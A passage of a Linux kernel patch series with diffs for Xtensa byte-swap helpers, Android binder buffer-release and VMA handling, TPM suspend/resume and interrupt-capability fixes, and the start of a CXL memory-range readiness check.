++	srli	a2, a3, 16
++	src	a2, a2, a3
++	src	a2, a2, a2
++	src	a2, a3, a2
++	mov	a3, a4
++	abi_ret_default
++
++ENDPROC(__bswapdi2)
+diff --git a/arch/xtensa/lib/bswapsi2.S b/arch/xtensa/lib/bswapsi2.S
+new file mode 100644
+index 0000000000000..9c1de1344f79a
+--- /dev/null
++++ b/arch/xtensa/lib/bswapsi2.S
+@@ -0,0 +1,16 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later WITH GCC-exception-2.0 */
++#include <linux/linkage.h>
++#include <asm/asmmacro.h>
++#include <asm/core.h>
++
++ENTRY(__bswapsi2)
++
++	abi_entry_default
++	ssai	8
++	srli	a3, a2, 16
++	src	a3, a3, a2
++	src	a3, a3, a3
++	src	a2, a2, a3
++	abi_ret_default
++
++ENDPROC(__bswapsi2)
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index 880224ec6abb8..e374a8a2da46e 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -1934,24 +1934,23 @@ static void binder_deferred_fd_close(int fd)
+ static void binder_transaction_buffer_release(struct binder_proc *proc,
+ 					      struct binder_thread *thread,
+ 					      struct binder_buffer *buffer,
+-					      binder_size_t failed_at,
++					      binder_size_t off_end_offset,
+ 					      bool is_failure)
+ {
+ 	int debug_id = buffer->debug_id;
+-	binder_size_t off_start_offset, buffer_offset, off_end_offset;
++	binder_size_t off_start_offset, buffer_offset;
+ 
+ 	binder_debug(BINDER_DEBUG_TRANSACTION,
+ 		     "%d buffer release %d, size %zd-%zd, failed at %llx\n",
+ 		     proc->pid, buffer->debug_id,
+ 		     buffer->data_size, buffer->offsets_size,
+-		     (unsigned long long)failed_at);
++		     (unsigned long long)off_end_offset);
+ 
+ 	if (buffer->target_node)
+ 		binder_dec_node(buffer->target_node, 1, 0);
+ 
+ 	off_start_offset = ALIGN(buffer->data_size, sizeof(void *));
+-	off_end_offset = is_failure && failed_at ? failed_at :
+-				off_start_offset + buffer->offsets_size;
++
+ 	for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
+ 	     buffer_offset += sizeof(binder_size_t)) {
+ 		struct binder_object_header *hdr;
+@@ -2111,6 +2110,21 @@ static void binder_transaction_buffer_release(struct binder_proc *proc,
+ 	}
+ }
+ 
++/* Clean up all the objects in the buffer */
++static inline void binder_release_entire_buffer(struct binder_proc *proc,
++						struct binder_thread *thread,
++						struct binder_buffer *buffer,
++						bool is_failure)
++{
++	binder_size_t off_end_offset;
++
++	off_end_offset = ALIGN(buffer->data_size, sizeof(void *));
++	off_end_offset += buffer->offsets_size;
++
++	binder_transaction_buffer_release(proc, thread, buffer,
++					  off_end_offset, is_failure);
++}
++
+ static int binder_translate_binder(struct flat_binder_object *fp,
+ 				   struct binder_transaction *t,
+ 				   struct binder_thread *thread)
+@@ -2801,7 +2815,7 @@ static int binder_proc_transaction(struct binder_transaction *t,
+ 		t_outdated->buffer = NULL;
+ 		buffer->transaction = NULL;
+ 		trace_binder_transaction_update_buffer_release(buffer);
+-		binder_transaction_buffer_release(proc, NULL, buffer, 0, 0);
++		binder_release_entire_buffer(proc, NULL, buffer, false);
+ 		binder_alloc_free_buf(&proc->alloc, buffer);
+ 		kfree(t_outdated);
+ 		binder_stats_deleted(BINDER_STAT_TRANSACTION);
+@@ -3759,7 +3773,7 @@ binder_free_buf(struct binder_proc *proc,
+ 		binder_node_inner_unlock(buf_node);
+ 	}
+ 	trace_binder_transaction_buffer_release(buffer);
+-	binder_transaction_buffer_release(proc, thread, buffer, 0, is_failure);
++	binder_release_entire_buffer(proc, thread, buffer, is_failure);
+ 	binder_alloc_free_buf(&proc->alloc, buffer);
+ }
+ 
+diff --git a/drivers/android/binder_alloc.c b/drivers/android/binder_alloc.c
+index 4ad42b0f75cd9..4fb89ef067d57 100644
+--- a/drivers/android/binder_alloc.c
++++ b/drivers/android/binder_alloc.c
+@@ -212,8 +212,8 @@ static int binder_update_page_range(struct binder_alloc *alloc, int allocate,
+ 		mm = alloc->mm;
+ 
+ 	if (mm) {
+-		mmap_read_lock(mm);
+-		vma = vma_lookup(mm, alloc->vma_addr);
++		mmap_write_lock(mm);
++		vma = alloc->vma;
+ 	}
+ 
+ 	if (!vma && need_mm) {
+@@ -270,7 +270,7 @@ static int binder_update_page_range(struct binder_alloc *alloc, int allocate,
+ 		trace_binder_alloc_page_end(alloc, index);
+ 	}
+ 	if (mm) {
+-		mmap_read_unlock(mm);
++		mmap_write_unlock(mm);
+ 		mmput(mm);
+ 	}
+ 	return 0;
+@@ -303,21 +303,24 @@ err_page_ptr_cleared:
+ 	}
+ err_no_vma:
+ 	if (mm) {
+-		mmap_read_unlock(mm);
++		mmap_write_unlock(mm);
+ 		mmput(mm);
+ 	}
+ 	return vma ? -ENOMEM : -ESRCH;
+ }
+ 
++static inline void binder_alloc_set_vma(struct binder_alloc *alloc,
++		struct vm_area_struct *vma)
++{
++	/* pairs with smp_load_acquire in binder_alloc_get_vma() */
++	smp_store_release(&alloc->vma, vma);
++}
++
+ static inline struct vm_area_struct *binder_alloc_get_vma(
+ 		struct binder_alloc *alloc)
+ {
+-	struct vm_area_struct *vma = NULL;
+-
+-	if (alloc->vma_addr)
+-		vma = vma_lookup(alloc->mm, alloc->vma_addr);
+-
+-	return vma;
++	/* pairs with smp_store_release in binder_alloc_set_vma() */
++	return smp_load_acquire(&alloc->vma);
+ }
+ 
+ static bool debug_low_async_space_locked(struct binder_alloc *alloc, int pid)
+@@ -380,15 +383,13 @@ static struct binder_buffer *binder_alloc_new_buf_locked(
+ 	size_t size, data_offsets_size;
+ 	int ret;
+ 
+-	mmap_read_lock(alloc->mm);
++	/* Check binder_alloc is fully initialized */
+ 	if (!binder_alloc_get_vma(alloc)) {
+-		mmap_read_unlock(alloc->mm);
+ 		binder_alloc_debug(BINDER_DEBUG_USER_ERROR,
+ 				   "%d: binder_alloc_buf, no vma\n",
+ 				   alloc->pid);
+ 		return ERR_PTR(-ESRCH);
+ 	}
+-	mmap_read_unlock(alloc->mm);
+ 
+ 	data_offsets_size = ALIGN(data_size, sizeof(void *)) +
+ 		ALIGN(offsets_size, sizeof(void *));
+@@ -778,7 +779,9 @@ int binder_alloc_mmap_handler(struct binder_alloc *alloc,
+ 	buffer->free = 1;
+ 	binder_insert_free_buffer(alloc, buffer);
+ 	alloc->free_async_space = alloc->buffer_size / 2;
+-	alloc->vma_addr = vma->vm_start;
++
++	/* Signal binder_alloc is fully initialized */
++	binder_alloc_set_vma(alloc, vma);
+ 
+ 	return 0;
+ 
+@@ -808,8 +811,7 @@ void binder_alloc_deferred_release(struct binder_alloc *alloc)
+ 
+ 	buffers = 0;
+ 	mutex_lock(&alloc->mutex);
+-	BUG_ON(alloc->vma_addr &&
+-	       vma_lookup(alloc->mm, alloc->vma_addr));
++	BUG_ON(alloc->vma);
+ 
+ 	while ((n = rb_first(&alloc->allocated_buffers))) {
+ 		buffer = rb_entry(n, struct binder_buffer, rb_node);
+@@ -916,25 +918,17 @@ void binder_alloc_print_pages(struct seq_file *m,
+ 	 * Make sure the binder_alloc is fully initialized, otherwise we might
+ 	 * read inconsistent state.
+ 	 */
+-
+-	mmap_read_lock(alloc->mm);
+-	if (binder_alloc_get_vma(alloc) == NULL) {
+-		mmap_read_unlock(alloc->mm);
+-		goto uninitialized;
+-	}
+-
+-	mmap_read_unlock(alloc->mm);
+-	for (i = 0; i < alloc->buffer_size / PAGE_SIZE; i++) {
+-		page = &alloc->pages[i];
+-		if (!page->page_ptr)
+-			free++;
+-		else if (list_empty(&page->lru))
+-			active++;
+-		else
+-			lru++;
++	if (binder_alloc_get_vma(alloc) != NULL) {
++		for (i = 0; i < alloc->buffer_size / PAGE_SIZE; i++) {
++			page = &alloc->pages[i];
++			if (!page->page_ptr)
++				free++;
++			else if (list_empty(&page->lru))
++				active++;
++			else
++				lru++;
++		}
+ 	}
+-
+-uninitialized:
+ 	mutex_unlock(&alloc->mutex);
+ 	seq_printf(m, "  pages: %d:%d:%d\n", active, lru, free);
+ 	seq_printf(m, "  pages high watermark: %zu\n", alloc->pages_high);
+@@ -969,7 +963,7 @@ int binder_alloc_get_allocated_count(struct binder_alloc *alloc)
+  */
+ void binder_alloc_vma_close(struct binder_alloc *alloc)
+ {
+-	alloc->vma_addr = 0;
++	binder_alloc_set_vma(alloc, NULL);
+ }
+ 
+ /**
+diff --git a/drivers/android/binder_alloc.h b/drivers/android/binder_alloc.h
+index 0f811ac4bcffd..138d1d5af9ce3 100644
+--- a/drivers/android/binder_alloc.h
++++ b/drivers/android/binder_alloc.h
+@@ -75,7 +75,7 @@ struct binder_lru_page {
+ /**
+  * struct binder_alloc - per-binder proc state for binder allocator
+  * @mutex:              protects binder_alloc fields
+- * @vma_addr:           vm_area_struct->vm_start passed to mmap_handler
++ * @vma:                vm_area_struct passed to mmap_handler
+  *                      (invariant after mmap)
+  * @mm:                 copy of task->mm (invariant after open)
+  * @buffer:             base of per-proc address space mapped via mmap
+@@ -99,7 +99,7 @@ struct binder_lru_page {
+  */
+ struct binder_alloc {
+ 	struct mutex mutex;
+-	unsigned long vma_addr;
++	struct vm_area_struct *vma;
+ 	struct mm_struct *mm;
+ 	void __user *buffer;
+ 	struct list_head buffers;
+diff --git a/drivers/android/binder_alloc_selftest.c b/drivers/android/binder_alloc_selftest.c
+index 43a881073a428..c2b323bc3b3a5 100644
+--- a/drivers/android/binder_alloc_selftest.c
++++ b/drivers/android/binder_alloc_selftest.c
+@@ -287,7 +287,7 @@ void binder_selftest_alloc(struct binder_alloc *alloc)
+ 	if (!binder_selftest_run)
+ 		return;
+ 	mutex_lock(&binder_selftest_lock);
+-	if (!binder_selftest_run || !alloc->vma_addr)
++	if (!binder_selftest_run || !alloc->vma)
+ 		goto done;
+ 	pr_info("STARTED\n");
+ 	binder_selftest_alloc_offset(alloc, end_offset, 0);
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index 5165f6d3da228..95d847c9de79a 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -568,6 +568,10 @@ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+ 	struct tpm_chip *chip = container_of(rng, struct tpm_chip, hwrng);
+ 
++	/* Give back zero bytes, as TPM chip has not yet fully resumed: */
++	if (chip->flags & TPM_CHIP_FLAG_SUSPENDED)
++		return 0;
++
+ 	return tpm_get_random(chip, data, max);
+ }
+ 
+@@ -601,6 +605,42 @@ static int tpm_get_pcr_allocation(struct tpm_chip *chip)
+ 	return rc;
+ }
+ 
++/*
++ * tpm_chip_bootstrap() - Boostrap TPM chip after power on
++ * @chip: TPM chip to use.
++ *
++ * Initialize TPM chip after power on. This a one-shot function: subsequent
++ * calls will have no effect.
++ */
++int tpm_chip_bootstrap(struct tpm_chip *chip)
++{
++	int rc;
++
++	if (chip->flags & TPM_CHIP_FLAG_BOOTSTRAPPED)
++		return 0;
++
++	rc = tpm_chip_start(chip);
++	if (rc)
++		return rc;
++
++	rc = tpm_auto_startup(chip);
++	if (rc)
++		goto stop;
++
++	rc = tpm_get_pcr_allocation(chip);
++stop:
++	tpm_chip_stop(chip);
++
++	/*
++	 * Unconditionally set, as driver initialization should cease, when the
++	 * boostrapping process fails.
++	 */
++	chip->flags |= TPM_CHIP_FLAG_BOOTSTRAPPED;
++
++	return rc;
++}
++EXPORT_SYMBOL_GPL(tpm_chip_bootstrap);
++
+ /*
+  * tpm_chip_register() - create a character device for the TPM chip
+  * @chip: TPM chip to use.
+@@ -616,17 +656,7 @@ int tpm_chip_register(struct tpm_chip *chip)
+ {
+ 	int rc;
+ 
+-	rc = tpm_chip_start(chip);
+-	if (rc)
+-		return rc;
+-	rc = tpm_auto_startup(chip);
+-	if (rc) {
+-		tpm_chip_stop(chip);
+-		return rc;
+-	}
+-
+-	rc = tpm_get_pcr_allocation(chip);
+-	tpm_chip_stop(chip);
++	rc = tpm_chip_bootstrap(chip);
+ 	if (rc)
+ 		return rc;
+ 
+diff --git a/drivers/char/tpm/tpm-interface.c b/drivers/char/tpm/tpm-interface.c
+index 7e513b7718320..0f941cb32eb17 100644
+--- a/drivers/char/tpm/tpm-interface.c
++++ b/drivers/char/tpm/tpm-interface.c
+@@ -412,6 +412,8 @@ int tpm_pm_suspend(struct device *dev)
+ 	}
+ 
+ suspended:
++	chip->flags |= TPM_CHIP_FLAG_SUSPENDED;
++
+ 	if (rc)
+ 		dev_err(dev, "Ignoring error %d while suspending\n", rc);
+ 	return 0;
+@@ -429,6 +431,14 @@ int tpm_pm_resume(struct device *dev)
+ 	if (chip == NULL)
+ 		return -ENODEV;
+ 
++	chip->flags &= ~TPM_CHIP_FLAG_SUSPENDED;
++
++	/*
++	 * Guarantee that SUSPENDED is written last, so that hwrng does not
++	 * activate before the chip has been fully resumed.
++	 */
++	wmb();
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(tpm_pm_resume);
+diff --git a/drivers/char/tpm/tpm.h b/drivers/char/tpm/tpm.h
+index 830014a266090..f6c99b3f00458 100644
+--- a/drivers/char/tpm/tpm.h
++++ b/drivers/char/tpm/tpm.h
+@@ -263,6 +263,7 @@ static inline void tpm_msleep(unsigned int delay_msec)
+ 		     delay_msec * 1000);
+ };
+ 
++int tpm_chip_bootstrap(struct tpm_chip *chip);
+ int tpm_chip_start(struct tpm_chip *chip);
+ void tpm_chip_stop(struct tpm_chip *chip);
+ struct tpm_chip *tpm_find_get_ops(struct tpm_chip *chip);
+diff --git a/drivers/char/tpm/tpm_tis.c b/drivers/char/tpm/tpm_tis.c
+index 4be19d8f3ca95..0d084d6652c41 100644
+--- a/drivers/char/tpm/tpm_tis.c
++++ b/drivers/char/tpm/tpm_tis.c
+@@ -243,7 +243,7 @@ static int tpm_tis_init(struct device *dev, struct tpm_info *tpm_info)
+ 		irq = tpm_info->irq;
+ 
+ 	if (itpm || is_itpm(ACPI_COMPANION(dev)))
+-		phy->priv.flags |= TPM_TIS_ITPM_WORKAROUND;
++		set_bit(TPM_TIS_ITPM_WORKAROUND, &phy->priv.flags);
+ 
+ 	return tpm_tis_core_init(dev, &phy->priv, irq, &tpm_tcg,
+ 				 ACPI_HANDLE(dev));
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index eecfbd7e97867..f02b583005a53 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -53,41 +53,63 @@ static int wait_for_tpm_stat(struct tpm_chip *chip, u8 mask,
+ 	long rc;
+ 	u8 status;
+ 	bool canceled = false;
++	u8 sts_mask = 0;
++	int ret = 0;
+ 
+ 	/* check current status */
+ 	status = chip->ops->status(chip);
+ 	if ((status & mask) == mask)
+ 		return 0;
+ 
+-	stop = jiffies + timeout;
++	/* check what status changes can be handled by irqs */
++	if (priv->int_mask & TPM_INTF_STS_VALID_INT)
++		sts_mask |= TPM_STS_VALID;
+ 
+-	if (chip->flags & TPM_CHIP_FLAG_IRQ) {
++	if (priv->int_mask & TPM_INTF_DATA_AVAIL_INT)
++		sts_mask |= TPM_STS_DATA_AVAIL;
++
++	if (priv->int_mask & TPM_INTF_CMD_READY_INT)
++		sts_mask |= TPM_STS_COMMAND_READY;
++
++	sts_mask &= mask;
++
++	stop = jiffies + timeout;
++	/* process status changes with irq support */
++	if (sts_mask) {
++		ret = -ETIME;
+ again:
+ 		timeout = stop - jiffies;
+ 		if ((long)timeout <= 0)
+ 			return -ETIME;
+ 		rc = wait_event_interruptible_timeout(*queue,
+-			wait_for_tpm_stat_cond(chip, mask, check_cancel,
++			wait_for_tpm_stat_cond(chip, sts_mask, check_cancel,
+ 					       &canceled),
+ 			timeout);
+ 		if (rc > 0) {
+ 			if (canceled)
+ 				return -ECANCELED;
+-			return 0;
++			ret = 0;
+ 		}
+ 		if (rc == -ERESTARTSYS && freezing(current)) {
+ 			clear_thread_flag(TIF_SIGPENDING);
+ 			goto again;
+ 		}
+-	} else {
+-		do {
+-			usleep_range(priv->timeout_min,
+-				     priv->timeout_max);
+-			status = chip->ops->status(chip);
+-			if ((status & mask) == mask)
+-				return 0;
+-		} while (time_before(jiffies, stop));
+ 	}
++
++	if (ret)
++		return ret;
++
++	mask &= ~sts_mask;
++	if (!mask) /* all done */
++		return 0;
++	/* process status changes without irq support */
++	do {
++		status = chip->ops->status(chip);
++		if ((status & mask) == mask)
++			return 0;
++		usleep_range(priv->timeout_min,
++			     priv->timeout_max);
++	} while (time_before(jiffies, stop));
+ 	return -ETIME;
+ }
+ 
+@@ -376,7 +398,7 @@ static int tpm_tis_send_data(struct tpm_chip *chip, const u8 *buf, size_t len)
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 	int rc, status, burstcnt;
+ 	size_t count = 0;
+-	bool itpm = priv->flags & TPM_TIS_ITPM_WORKAROUND;
++	bool itpm = test_bit(TPM_TIS_ITPM_WORKAROUND, &priv->flags);
+ 
+ 	status = tpm_tis_status(chip);
+ 	if ((status & TPM_STS_COMMAND_READY) == 0) {
+@@ -509,7 +531,8 @@ static int tpm_tis_send(struct tpm_chip *chip, u8 *buf, size_t len)
+ 	int rc, irq;
+ 	struct tpm_tis_data *priv = dev_get_drvdata(&chip->dev);
+ 
+-	if (!(chip->flags & TPM_CHIP_FLAG_IRQ) || priv->irq_tested)
++	if (!(chip->flags & TPM_CHIP_FLAG_IRQ) ||
++	     test_bit(TPM_TIS_IRQ_TESTED, &priv->flags))
+ 		return tpm_tis_send_main(chip, buf, len);
+ 
+ 	/* Verify receipt of the expected IRQ */
+@@ -519,11 +542,11 @@ static int tpm_tis_send(struct tpm_chip *chip, u8 *buf, size_t len)
+ 	rc = tpm_tis_send_main(chip, buf, len);
+ 	priv->irq = irq;
+ 	chip->flags |= TPM_CHIP_FLAG_IRQ;
+-	if (!priv->irq_tested)
++	if (!test_bit(TPM_TIS_IRQ_TESTED, &priv->flags))
+ 		tpm_msleep(1);
+-	if (!priv->irq_tested)
++	if (!test_bit(TPM_TIS_IRQ_TESTED, &priv->flags))
+ 		disable_interrupts(chip);
+-	priv->irq_tested = true;
++	set_bit(TPM_TIS_IRQ_TESTED, &priv->flags);
+ 	return rc;
+ }
+ 
+@@ -666,7 +689,7 @@ static int probe_itpm(struct tpm_chip *chip)
+ 	size_t len = sizeof(cmd_getticks);
+ 	u16 vendor;
+ 
+-	if (priv->flags & TPM_TIS_ITPM_WORKAROUND)
++	if (test_bit(TPM_TIS_ITPM_WORKAROUND, &priv->flags))
+ 		return 0;
+ 
+ 	rc = tpm_tis_read16(priv, TPM_DID_VID(0), &vendor);
+@@ -686,13 +709,13 @@ static int probe_itpm(struct tpm_chip *chip)
+ 
+ 	tpm_tis_ready(chip);
+ 
+-	priv->flags |= TPM_TIS_ITPM_WORKAROUND;
++	set_bit(TPM_TIS_ITPM_WORKAROUND, &priv->flags);
+ 
+ 	rc = tpm_tis_send_data(chip, cmd_getticks, len);
+ 	if (rc == 0)
+ 		dev_info(&chip->dev, "Detected an iTPM.\n");
+ 	else {
+-		priv->flags &= ~TPM_TIS_ITPM_WORKAROUND;
++		clear_bit(TPM_TIS_ITPM_WORKAROUND, &priv->flags);
+ 		rc = -EFAULT;
+ 	}
+ 
+@@ -736,7 +759,7 @@ static irqreturn_t tis_int_handler(int dummy, void *dev_id)
+ 	if (interrupt == 0)
+ 		return IRQ_NONE;
+ 
+-	priv->irq_tested = true;
++	set_bit(TPM_TIS_IRQ_TESTED, &priv->flags);
+ 	if (interrupt & TPM_INTF_DATA_AVAIL_INT)
+ 		wake_up_interruptible(&priv->read_queue);
+ 	if (interrupt & TPM_INTF_LOCALITY_CHANGE_INT)
+@@ -819,7 +842,7 @@ static int tpm_tis_probe_irq_single(struct tpm_chip *chip, u32 intmask,
+ 	if (rc < 0)
+ 		goto restore_irqs;
+ 
+-	priv->irq_tested = false;
++	clear_bit(TPM_TIS_IRQ_TESTED, &priv->flags);
+ 
+ 	/* Generate an interrupt by having the core call through to
+ 	 * tpm_tis_send
+@@ -1031,8 +1054,40 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 	if (rc < 0)
+ 		goto out_err;
+ 
+-	intmask |= TPM_INTF_CMD_READY_INT | TPM_INTF_LOCALITY_CHANGE_INT |
+-		   TPM_INTF_DATA_AVAIL_INT | TPM_INTF_STS_VALID_INT;
++	/* Figure out the capabilities */
++	rc = tpm_tis_read32(priv, TPM_INTF_CAPS(priv->locality), &intfcaps);
++	if (rc < 0)
++		goto out_err;
++
++	dev_dbg(dev, "TPM interface capabilities (0x%x):\n",
++		intfcaps);
++	if (intfcaps & TPM_INTF_BURST_COUNT_STATIC)
++		dev_dbg(dev, "\tBurst Count Static\n");
++	if (intfcaps & TPM_INTF_CMD_READY_INT) {
++		intmask |= TPM_INTF_CMD_READY_INT;
++		dev_dbg(dev, "\tCommand Ready Int Support\n");
++	}
++	if (intfcaps & TPM_INTF_INT_EDGE_FALLING)
++		dev_dbg(dev, "\tInterrupt Edge Falling\n");
++	if (intfcaps & TPM_INTF_INT_EDGE_RISING)
++		dev_dbg(dev, "\tInterrupt Edge Rising\n");
++	if (intfcaps & TPM_INTF_INT_LEVEL_LOW)
++		dev_dbg(dev, "\tInterrupt Level Low\n");
++	if (intfcaps & TPM_INTF_INT_LEVEL_HIGH)
++		dev_dbg(dev, "\tInterrupt Level High\n");
++	if (intfcaps & TPM_INTF_LOCALITY_CHANGE_INT) {
++		intmask |= TPM_INTF_LOCALITY_CHANGE_INT;
++		dev_dbg(dev, "\tLocality Change Int Support\n");
++	}
++	if (intfcaps & TPM_INTF_STS_VALID_INT) {
++		intmask |= TPM_INTF_STS_VALID_INT;
++		dev_dbg(dev, "\tSts Valid Int Support\n");
++	}
++	if (intfcaps & TPM_INTF_DATA_AVAIL_INT) {
++		intmask |= TPM_INTF_DATA_AVAIL_INT;
++		dev_dbg(dev, "\tData Avail Int Support\n");
++	}
++
+ 	intmask &= ~TPM_GLOBAL_INT_ENABLE;
+ 
+ 	rc = tpm_tis_request_locality(chip, 0);
+@@ -1066,35 +1121,14 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		goto out_err;
+ 	}
+ 
+-	/* Figure out the capabilities */
+-	rc = tpm_tis_read32(priv, TPM_INTF_CAPS(priv->locality), &intfcaps);
+-	if (rc < 0)
+-		goto out_err;
+-
+-	dev_dbg(dev, "TPM interface capabilities (0x%x):\n",
+-		intfcaps);
+-	if (intfcaps & TPM_INTF_BURST_COUNT_STATIC)
+-		dev_dbg(dev, "\tBurst Count Static\n");
+-	if (intfcaps & TPM_INTF_CMD_READY_INT)
+-		dev_dbg(dev, "\tCommand Ready Int Support\n");
+-	if (intfcaps & TPM_INTF_INT_EDGE_FALLING)
+-		dev_dbg(dev, "\tInterrupt Edge Falling\n");
+-	if (intfcaps & TPM_INTF_INT_EDGE_RISING)
+-		dev_dbg(dev, "\tInterrupt Edge Rising\n");
+-	if (intfcaps & TPM_INTF_INT_LEVEL_LOW)
+-		dev_dbg(dev, "\tInterrupt Level Low\n");
+-	if (intfcaps & TPM_INTF_INT_LEVEL_HIGH)
+-		dev_dbg(dev, "\tInterrupt Level High\n");
+-	if (intfcaps & TPM_INTF_LOCALITY_CHANGE_INT)
+-		dev_dbg(dev, "\tLocality Change Int Support\n");
+-	if (intfcaps & TPM_INTF_STS_VALID_INT)
+-		dev_dbg(dev, "\tSts Valid Int Support\n");
+-	if (intfcaps & TPM_INTF_DATA_AVAIL_INT)
+-		dev_dbg(dev, "\tData Avail Int Support\n");
+-
+ 	/* INTERRUPT Setup */
+ 	init_waitqueue_head(&priv->read_queue);
+ 	init_waitqueue_head(&priv->int_queue);
++
++	rc = tpm_chip_bootstrap(chip);
++	if (rc)
++		goto out_err;
++
+ 	if (irq != -1) {
+ 		/*
+ 		 * Before doing irq testing issue a command to the TPM in polling mode
+@@ -1122,7 +1156,9 @@ int tpm_tis_core_init(struct device *dev, struct tpm_tis_data *priv, int irq,
+ 		else
+ 			tpm_tis_probe_irq(chip, intmask);
+ 
+-		if (!(chip->flags & TPM_CHIP_FLAG_IRQ)) {
++		if (chip->flags & TPM_CHIP_FLAG_IRQ) {
++			priv->int_mask = intmask;
++		} else {
+ 			dev_err(&chip->dev, FW_BUG
+ 					"TPM interrupt not working, polling instead\n");
+ 
+@@ -1159,31 +1195,20 @@ static void tpm_tis_reenable_interrupts(struct tpm_chip *chip)
+ 	u32 intmask;
+ 	int rc;
+ 
+-	if (chip->ops->clk_enable != NULL)
+-		chip->ops->clk_enable(chip, true);
+-
+-	/* reenable interrupts that device may have lost or
+-	 * BIOS/firmware may have disabled
++	/*
++	 * Re-enable interrupts that device may have lost or BIOS/firmware may
++	 * have disabled.
+ 	 */
+ 	rc = tpm_tis_write8(priv, TPM_INT_VECTOR(priv->locality), priv->irq);
+-	if (rc < 0)
+-		goto out;
++	if (rc < 0) {
++		dev_err(&chip->dev, "Setting IRQ failed.\n");
++		return;
++	}
+ 
+-	rc = tpm_tis_read32(priv, TPM_INT_ENABLE(priv->locality), &intmask);
++	intmask = priv->int_mask | TPM_GLOBAL_INT_ENABLE;
++	rc = tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality), intmask);
+ 	if (rc < 0)
+-		goto out;
+-
+-	intmask |= TPM_INTF_CMD_READY_INT
+-	    | TPM_INTF_LOCALITY_CHANGE_INT | TPM_INTF_DATA_AVAIL_INT
+-	    | TPM_INTF_STS_VALID_INT | TPM_GLOBAL_INT_ENABLE;
+-
+-	tpm_tis_write32(priv, TPM_INT_ENABLE(priv->locality), intmask);
+-
+-out:
+-	if (chip->ops->clk_enable != NULL)
+-		chip->ops->clk_enable(chip, false);
+-
+-	return;
++		dev_err(&chip->dev, "Enabling interrupts failed.\n");
+ }
+ 
+ int tpm_tis_resume(struct device *dev)
+@@ -1191,27 +1216,27 @@ int tpm_tis_resume(struct device *dev)
+ 	struct tpm_chip *chip = dev_get_drvdata(dev);
+ 	int ret;
+ 
+-	ret = tpm_tis_request_locality(chip, 0);
+-	if (ret < 0)
++	ret = tpm_chip_start(chip);
++	if (ret)
+ 		return ret;
+ 
+ 	if (chip->flags & TPM_CHIP_FLAG_IRQ)
+ 		tpm_tis_reenable_interrupts(chip);
+ 
+-	ret = tpm_pm_resume(dev);
+-	if (ret)
+-		goto out;
+-
+ 	/*
+ 	 * TPM 1.2 requires self-test on resume. This function actually returns
+ 	 * an error code but for unknown reason it isn't handled.
+ 	 */
+ 	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
+ 		tpm1_do_selftest(chip);
+-out:
+-	tpm_tis_relinquish_locality(chip, 0);
+ 
+-	return ret;
++	tpm_chip_stop(chip);
++
++	ret = tpm_pm_resume(dev);
++	if (ret)
++		return ret;
++
++	return 0;
+ }
+ EXPORT_SYMBOL_GPL(tpm_tis_resume);
+ #endif
+diff --git a/drivers/char/tpm/tpm_tis_core.h b/drivers/char/tpm/tpm_tis_core.h
+index 1d51d5168fb6e..e978f457fd4d4 100644
+--- a/drivers/char/tpm/tpm_tis_core.h
++++ b/drivers/char/tpm/tpm_tis_core.h
+@@ -87,6 +87,7 @@ enum tpm_tis_flags {
+ 	TPM_TIS_ITPM_WORKAROUND		= BIT(0),
+ 	TPM_TIS_INVALID_STATUS		= BIT(1),
+ 	TPM_TIS_DEFAULT_CANCELLATION	= BIT(2),
++	TPM_TIS_IRQ_TESTED		= BIT(3),
+ };
+ 
+ struct tpm_tis_data {
+@@ -95,7 +96,7 @@ struct tpm_tis_data {
+ 	unsigned int locality_count;
+ 	int locality;
+ 	int irq;
+-	bool irq_tested;
++	unsigned int int_mask;
+ 	unsigned long flags;
+ 	void __iomem *ilb_base_addr;
+ 	u16 clkrun_enabled;
+diff --git a/drivers/cxl/core/pci.c b/drivers/cxl/core/pci.c
+index a8456d5441fc7..003a44132418a 100644
+--- a/drivers/cxl/core/pci.c
++++ b/drivers/cxl/core/pci.c
+@@ -103,23 +103,57 @@ int devm_cxl_port_enumerate_dports(struct cxl_port *port)
+ }
+ EXPORT_SYMBOL_NS_GPL(devm_cxl_port_enumerate_dports, CXL);
+ 
+-/*
+- * Wait up to @media_ready_timeout for the device to report memory
+- * active.
+- */
+-int cxl_await_media_ready(struct cxl_dev_state *cxlds)
++static int cxl_dvsec_mem_range_valid(struct cxl_dev_state *cxlds, int id)
++{
++	struct pci_dev *pdev = to_pci_dev(cxlds->dev);
++	int d = cxlds->cxl_dvsec;
++	bool valid = false;
++	int rc, i;
++	u32 temp;
++
++	if (id > CXL_DVSEC_RANGE_MAX)
++		return -EINVAL;
++
++	/* Check MEM INFO VALID bit first, give up after 1s */
++	i = 1;
++	do {
++		rc = pci_read_config_dword(pdev,
++					   d + CXL_DVSEC_RANGE_SIZE_LOW(id),
++					   &temp);
++		if (rc)
++			return rc;
++
++		valid = FIELD_GET(CXL_DVSEC_MEM_INFO_VALID, temp);
++		if (valid)
++			break;
++		msleep(1000);
++	} while (i--);
++
++	if (!valid) {
++		dev_err(&pdev->dev,
++			"Timeout awaiting memory range %d valid after 1s.\n",
++			id);
++		return -ETIMEDOUT;
++	}
++
++	return 0;
++}
++
++static int cxl_dvsec_mem_range_active(struct cxl_dev_state *cxlds, int id)
+ {
+ 	struct pci_dev *pdev = to_pci_dev(cxlds->dev);
+ 	int d = cxlds->cxl_dvsec;
+ 	bool active = false;
+-	u64 md_status;
+ 	int rc, i;
++	u32 temp;
+ 
+-	for (i = media_ready_timeout; i; i--) {
+-		u32 temp;
++	if (id > CXL_DVSEC_RANGE_MAX)
